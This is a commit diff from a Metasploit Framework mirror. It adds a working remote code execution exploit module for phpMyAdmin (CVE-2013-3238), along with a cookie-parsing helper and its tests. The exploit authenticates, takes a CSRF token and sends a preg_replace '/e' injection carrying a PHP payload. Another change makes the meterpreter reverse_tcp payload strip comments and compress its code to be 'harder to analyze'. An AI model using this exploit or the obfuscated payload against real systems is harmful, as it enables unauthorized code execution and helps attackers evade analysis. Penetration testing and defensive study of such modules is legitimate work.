infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238) 

[Closes #1772]
unstable
sinn3r 2013-04-28 12:17:16 -05:00
parent 6821c360b6 ccb630eca2
commit 1d9a695d2b
5 changed files with 332 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
data/meterpreter/meterpreter.php
View File

@ -265,7 +265,7 @@ function core_channel_write($req, &$pkt) {
}
#
# This is called when the client wants to close a channel explicitly. Not to be confused with
# This is called when the client wants to close a channel explicitly. Not to be confused with
#
function core_channel_close($req, &$pkt) {
global $channel_process_map;
@ -297,7 +297,7 @@ function core_channel_close($req, &$pkt) {
return ERROR_FAILURE;
}
#
#
# Destroy a channel and all associated handles.
#
function channel_close_handles($cid) {
@ -578,7 +578,7 @@ function handle_dead_resource_channel($resource) {
# Make sure the provided resource gets closed regardless of it's status
# as a channel
remove_reader($resource);
remove_reader($resource);
close($resource);
} else {
my_print("Handling dead resource: {$resource}, for channel: {$cid}");
@ -822,7 +822,7 @@ function eof($resource) {
#
# See http://us2.php.net/manual/en/function.feof.php , specifically this:
# If a connection opened by fsockopen() wasn't closed by the server,
# feof() will hang. To workaround this, see below example:
# feof() will hang. To workaround this, see below example:
# <?php
# function safe_feof($fp, &$start = NULL) {
# ...
@ -862,7 +862,7 @@ function read($resource, $len=null) {
#my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
$buff = '';
switch (get_rtype($resource)) {
case 'socket':
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Reading UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
@ -915,13 +915,13 @@ function read($resource, $len=null) {
break;
}
}
if ($resource != $msgsock) { my_print("buff: '$buff'"); }
$r = Array($resource);
}
my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff)));
break;
default:
default:
# then this is possibly a closed channel resource, see if we have any
# data from previous reads
$cid = get_channel_id_from_resource($resource);
@ -948,7 +948,7 @@ function write($resource, $buff, $len=0) {
#my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
$count = false;
switch (get_rtype($resource)) {
case 'socket':
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Writing UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
@ -957,7 +957,7 @@ function write($resource, $buff, $len=0) {
$count = socket_write($resource, $buff, $len);
}
break;
case 'stream':
case 'stream':
$count = fwrite($resource, $buff, $len);
fflush($resource);
break;
@ -1107,7 +1107,7 @@ if (!isset($GLOBALS['msgsock'])) {
case 'socket':
register_socket($msgsock);
break;
case 'stream':
case 'stream':
# fall through
default:
register_stream($msgsock);
@ -1156,7 +1156,7 @@ while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
if ($request) {
write($msgsock, $request);
}
}
}
}
}
# $r is modified by select, so reset it

22
lib/rex/proto/http/response.rb
View File

@ -58,6 +58,28 @@ class Response < Packet
self.count_100 = 0
end
#
# Gets cookies from the Set-Cookie header in a format to be used
# in the 'cookie' send_request field
#
def get_cookies
cookies = ""
if (self.headers.include?('Set-Cookie'))
set_cookies = self.headers['Set-Cookie']
key_vals = set_cookies.scan(/\s?([^, ;]+?)=(.*?);/)
key_vals.each do |k, v|
# Dont downcase actual cookie name as may be case sensitive
name = k.downcase
next if name == 'path'
next if name == 'expires'
next if name == 'domain'
cookies << "#{k}=#{v}; "
end
end
return cookies.strip
end
#
# Updates the various parts of the HTTP response command string.
#

181
modules/exploits/multi/http/phpmyadmin_preg_replace.rb Normal file
View File

@ -0,0 +1,181 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',
'Description' => %q{
This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's
replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php
This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
PHP versions > 5.4.6 are not vulnerable.
},
'Author' =>
[
'Janek "waraxe" Vind', # Discovery
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3238' ],
[ 'PMASA', '2013-2'],
[ 'waraxe', '2013-SA#103' ],
[ 'EDB', '25003'],
[ 'OSVDB', '92793'],
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'BadChars' => "&\n=+%",
# Clear out PMA's error handler so it doesn't lose its mind
# and cause ENOMEM errors and segfaults in the destructor.
'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 25 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
], self.class)
end
def check
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
rescue
print_error("Unable to connect to server.")
return CheckCode::Unknown
end
if res.code != 200
print_error("Unable to query /js/messages.php")
return CheckCode::Unknown
end
php_version = res['X-Powered-By']
if php_version
print_status("PHP Version: #{php_version}")
if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
if $1.to_i > 5
return CheckCode::Safe
else
if $1.to_i == 5 and $2.to_i > 4
return CheckCode::Safe
else
if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6
return CheckCode::Safe
end
end
end
end
else
print_status("Unknown PHP Version")
end
if res.body =~ /pmaversion = '(.*)';/
print_status("phpMyAdmin version: #{$1}")
case $1.downcase
when '3.5.8.1', '4.0.0-rc3'
return CheckCode::Safe
when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
return CheckCode::Vulnerable
else
if $1.starts_with? '3.5.'
return CheckCode::Vulnerable
end
return CheckCode::Unknown
end
end
end
def exploit
uri = target_uri.path
print_status("Grabbing CSRF token...")
response = send_request_cgi({ 'uri' => uri})
if response.nil?
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
end
if (response.body !~ /"token"\s*value="([^"]*)"/)
fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
else
print_good("Retrieved token")
end
token = $1
post = {
'token' => token,
'pma_username' => datastore['USERNAME'],
'pma_password' => datastore['PASSWORD']
}
print_status("Authenticating...")
login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'vars_post' => post
})
if login.nil?
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
end
token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
cookies = login.get_cookies
login_check = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})
if login_check.body =~ /Welcome to/
fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
else
print_good("Authentication successful")
end
db = rand_text_alpha(3+rand(3))
exploit_result = send_request_cgi({
'uri' => normalize_uri(uri, 'db_structure.php'),
'method' => 'POST',
'cookie' => cookies,
'vars_post' => {
'query_type' => 'replace_prefix_tbl',
'db' => db,
'selected[0]' => db,
'token' => token,
'from_prefix' => "/e\0",
'to_prefix' => payload.encoded,
'mult_btn' => 'Yes'
}
},1)
end
end

11
modules/payloads/singles/php/meterpreter_reverse_tcp.rb
View File

@ -33,11 +33,12 @@ module Metasploit3
f.read(f.stat.size)
}
met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
met.gsub!("4444", datastore['LPORT']) if datastore['LPORT']
# XXX When this payload is more stable, remove comments and compress
# whitespace to make it smaller and a bit harder to analyze
#met.gsub!(/#.*$/, '')
#met = Rex::Text.compress(met)
met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']
# remove comments and compress whitespace to make it smaller and a
# bit harder to analyze
met.gsub!(/#.*$/, '')
met = Rex::Text.compress(met)
met
end
end

112
spec/lib/rex/proto/http/response_spec.rb Normal file
View File

@ -0,0 +1,112 @@
require 'rex/proto/http/response'
get_cookies_test_1 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 12:43:12 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
Vary: Accept-Encoding
Content-Length: 63951
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
get_cookies_test_2 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
get_cookies_test_3 = '
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
get_cookies_test_4 ='
HTTP/1.1 200 OK
Date: Fri, 26 Apr 2013 08:44:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
Vary: Accept-Encoding
Content-Length: 7356
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
describe Rex::Proto::Http::Response do
R = Rex::Proto::Http::Response
it "get_cookies returns empty string for no Set-Cookies" do
resp = R.new()
resp.parse(get_cookies_test_1)
resp.get_cookies.should eq("")
end
it "get_cookies returns 5 cookies for test 2" do
resp = R.new()
resp.parse(get_cookies_test_2)
resp.get_cookies.split(';').count.should eq(5)
end
it "get_cookies returns 5 cookies for test 3 and parses full cookie" do
resp = R.new()
resp.parse(get_cookies_test_3)
resp.get_cookies.split(';').count.should eq(5)
resp.get_cookies.include?("superC00kie!=stupidcookie;").should be_true
end
it "get_cookies returns 5 cookies for test 4 and parses empty value" do
resp = R.new()
resp.parse(get_cookies_test_4)
resp.get_cookies.split(';').count.should eq(5)
resp.get_cookies.include?("phpMyAdmin=;").should be_true
end
end